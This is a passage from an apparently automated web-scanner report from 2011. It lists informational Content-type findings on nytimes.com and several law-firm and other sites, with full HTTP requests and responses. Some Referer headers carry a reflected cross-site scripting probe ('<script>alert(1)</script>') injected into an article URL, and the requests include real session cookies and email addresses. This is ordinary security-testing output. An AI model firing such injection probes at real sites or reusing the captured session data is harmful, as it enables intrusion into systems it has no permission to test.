36.19. http://www.nytimes.com/adx/bin/clientside/6d2cd6a9Q2FQ2AQ3CTxJQ22Q2F8qBs8xToxs8YQ2BYxhsBIQ2B  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nytimes.com
Path:   /adx/bin/clientside/6d2cd6a9Q2FQ2AQ3CTxJQ22Q2F8qBs8xToxs8YQ2BYxhsBIQ2B

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

GET /adx/bin/clientside/6d2cd6a9Q2FQ2AQ3CTxJQ22Q2F8qBs8xToxs8YQ2BYxhsBIQ2B HTTP/1.1
Host: www.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html?59261%22%3E%3Cscript%3Ealert(1)%3C/script%3E223d24b026d=1
Cookie: RMID=de922e2c777a4dcc117c807b; nyt-m=61755AB5B621ED6279F440ECA861ED6F&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.20.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199757505:ss=1305199567634; _chartbeat2=8c1mweurlbk22c68; rsi_segs=D08734_70010|D08734_70105|H07707_10872|H07707_10950|H07707_10954|H07707_10987|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11030|H07707_11044|H07707_11048|H07707_10638; news_people_toolbar=NO

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 19:53:43 GMT
Content-type: text/html
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache
Pragma: no-cache
Content-Length: 45

GIF89a.............!.......,..............X.;
36.20. http://www.nytimes.com/facebook  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nytimes.com
Path:   /facebook

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /facebook?format=json HTTP/1.1
Host: www.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Referer: http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html?59261%22%3E%3Cscript%3Ealert(1)%3C/script%3E223d24b026d=1
Cookie: RMID=de922e2c777a4dcc117c807b; nyt-m=63287DEF2409E7B7D9BE087FA2837C71&e=i.1306900800&t=i.20&v=i.1&l=l.15.2851997893.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.1.0.0.0&pr=l.4.21.0.0.0&vp=i.0&gf=l.20.2851997893.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199757505:ss=1305199567634; _chartbeat2=8c1mweurlbk22c68; rsi_segs=D08734_70010|D08734_70105|H07707_10872|H07707_10950|H07707_10954|H07707_10987|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11030|H07707_11044|H07707_11048|H07707_10638; news_people_toolbar=NO

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 19:54:14 GMT
ntCoent-length: 866
Content-type: text/html
Pragma: no-cache
Expires: -1
Cache-control: no-cache
Cache-control: no-store
Cache-control: max-age=1
Cneonction: close
Content-Length: 866

[{"title":"Proms as Do-Overs for Adults","url":"http:\/\/www.nytimes.com\/2011\/05\/12\/us\/12prom.html\/","counts":{"share_count":"7","post_count":"88","like_count":"92","comment_count":"164","click_
...[SNIP]...
36.21. http://www.nytimes.com/svc/timespeople/bell.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nytimes.com
Path:   /svc/timespeople/bell.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /svc/timespeople/bell.html HTTP/1.1
Host: www.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://timespeople.nytimes.com/packages/html/timespeople/xmlhttprequest.html?url=%2Fsvc%2Ftimespeople%2Ftoolbar%2F1.0%2Fuser%3Fpage_url%3Dhttp%3A%2F%2Fwww.nytimes.com%2F2010%2F08%2F22%2Fsports%2Fcycling%2F22armstrong.html%3F59261%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E223d24b026d%3D1&method=get&params=&bell=http://www.nytimes.com/svc/timespeople/bell.html
Cookie: RMID=de922e2c777a4dcc117c807b; nyt-m=63287DEF2409E7B7D9BE087FA2837C71&e=i.1306900800&t=i.20&v=i.1&l=l.15.2851997893.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.1.0.0.0&pr=l.4.21.0.0.0&vp=i.0&gf=l.20.2851997893.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199757505:ss=1305199567634; _chartbeat2=8c1mweurlbk22c68; rsi_segs=D08734_70010|D08734_70105|H07707_10872|H07707_10950|H07707_10954|H07707_10987|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11030|H07707_11044|H07707_11048|H07707_10638; news_people_toolbar=NO

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 19:54:11 GMT
Content-type: text/html
Cache-Control: private
Content-Length: 54

<!-- This file is used by NewsPeple. Do not delete -->
36.22. http://www.porterwright.com/files/ImageControl/df2c4f38-f32b-4661-95a3-f93deff66e3b/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/SitemapImage.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.porterwright.com
Path:   /files/ImageControl/df2c4f38-f32b-4661-95a3-f93deff66e3b/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/SitemapImage.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a BMP image.

Request

GET /files/ImageControl/df2c4f38-f32b-4661-95a3-f93deff66e3b/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/SitemapImage.jpg HTTP/1.1
Host: www.porterwright.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.porterwright.com/careers/
Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; __utma=221978393.1924349939.1305202915.1305216543.1305218573.3; __utmz=221978393.1305216543.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Porter%20Wright%20Morris%20%26%20Arthur; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1146; PortletId=36001; SiteId=1111; SERVER_PORT=80; ASP.NET_SessionId=vun322455osceway4gqyfo55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1097&RootPortletID=676&RootPortletH4AssetID=383&LicenseKey= &Name=Web Framework&URL=websites; ZoneId=7; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; __utmc=221978393; __utmb=221978393.3.10.1305218573

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 5086
Content-Type: image/jpeg
Last-Modified: Wed, 22 Sep 2010 17:59:43 GMT
Accept-Ranges: bytes
ETag: "2c9899ef7f5acb1:afa4"
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000896
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A67
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:50:36 GMT

BM........6...(...b..................................................uuu\\\CCCPPPuuu..............................ttt\\\CCC\\\uuu...............PPP\\\......CCC....................................iiiPP
...[SNIP]...
36.23. http://www.stumbleupon.com/hostedbadge.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.stumbleupon.com
Path:   /hostedbadge.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /hostedbadge.php?s=1 HTTP/1.1
Host: www.stumbleupon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/technology/cio-priorities/ipad-business.jsp?prm=TW_CHCIOP

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Keep-Alive: timeout=30, max=100
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 12 May 2011 20:19:32 GMT
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 391


   function writeSuBadge () {
       var bdg = "<iframe src=\"http:\/\/www.stumbleupon.com\/badge\/embed\/1\/?url=http%3A%2F%2Fwww.gartner.com%2Ftechnology%2Fcio-priorities%2Fipad-business.jsp%3Fprm%3DTW_C
...[SNIP]...
36.24. http://www.wiggin.com/images/nav_recruiting.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wiggin.com
Path:   /images/nav_recruiting.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /images/nav_recruiting.gif HTTP/1.1
Host: www.wiggin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wiggin.com/
Cookie: ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid

Response

HTTP/1.1 200 OK
Content-Length: 1191
Content-Type: image/gif
Last-Modified: Thu, 11 Feb 2010 09:15:26 GMT
Accept-Ranges: bytes
ETag: "309c7abffaaaca1:54c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:02:40 GMT

......JFIF.....d.d......Ducky.......N......Adobe.d.................................................    ...............................
..
..
.........................................................#.Q..
...[SNIP]...
37. Content type is not specified  previous
There are 5 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

37.1. https://client.poynerspruill.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://client.poynerspruill.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: client.poynerspruill.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: __utma=27281085.1533661144.1305216539.1305216539.1305218531.2; __utmc=27281085; __utmz=27281085.1305216539.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Poyner%20Spruill; __utmb=27281085.2.10.1305218531

Response

HTTP/1.1 404 NOT FOUND
Date: Thu, 12 May 2011 16:42:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Exires: Wed, 27 Apr 2011 16:42:40 GMT
Cache-Control: private,max-age=0
Content-Length: 13
Public-Extension: http://schemas.microsoft.com/repl-2

404 NOT FOUND
37.2. http://gigablast.com/scripts/rollovers.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gigablast.com
Path:   /scripts/rollovers.js

Request

GET /scripts/rollovers.js HTTP/1.1
Accept: */*
Referer: http://gigablast.com/about.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: gigablast.com

Response

HTTP/1.0 404 (Not Found)
Content-length: 37
Connection: Close
Date: Thu May 12 15:14:14 2011 UTC

<html><b>Error = Not Found</b></html>
37.3. http://labs.natpal.com/trk/lead  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://labs.natpal.com
Path:   /trk/lead

Request

GET /trk/lead?code=4121&db=contacts&source=Contact&type=signup&user_email_msg=Thank_You_Contact&admin_email_addr=LSD@layserfreiwald.com%2Cjosh@emailmessaging.net&redir=http%3A//www.envoyglobal.net/elawmarketing/layser/thankyou.htm&formmissing=http%3A//www.envoyglobal.net/elawmarketing/layser/error.htm&formerror=http%3A//www.envoyglobal.net/elawmarketing/layser/error.htm&first_name*=Name&email*=Email&phone*=Phone&briefdescription*=Briefly%20describe%20your%20legal%20issue%20here&agreeterms*=&ydl_td=layserfreiwald.com&=Submit& HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: labs.natpal.com
Cookie: uid=1557196227768837

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Language: en-US
Content-Length: 43
Date: Thu, 12 May 2011 19:08:39 GMT

GIF89a.............!.......,...........L..;
37.4. http://labs.natpal.com/trk/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://labs.natpal.com
Path:   /trk/pixel

Request

GET /trk/pixel?trackid=&trkDomain=layserfreiwald.com&referrer=http%3A//www.elawmarketing.com/portfolio/websites/layser-freiwald&pageVisited=http%3A//layserfreiwald.com/&browser=Firefox&browserVersion=4&OS=Windows&maxHeight=1156&maxWidth=1920&npuid=test HTTP/1.1
Host: labs.natpal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/
Cookie: uid=uidtest

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: uid=1557191932790277; Domain=natpal.com; Expires=Sun, 09-May-2021 18:09:04 GMT; Path=/
Content-Language: en-US
Content-Length: 43
Date: Thu, 12 May 2011 18:09:04 GMT

GIF89a.............!.......,...........L..;
37.5. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /news/story/therese-polettis-tech-tales-ebay/story.aspx

Request

GET /news/story/therese-polettis-tech-tales-ebay/story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 13-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdfpswebp04
Date: Thu, 12 May 2011 16:55:26 GMT
Content-Length: 47848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
Report generated by XSS.CX at Thu May 12 19:54:51 CDT 2011.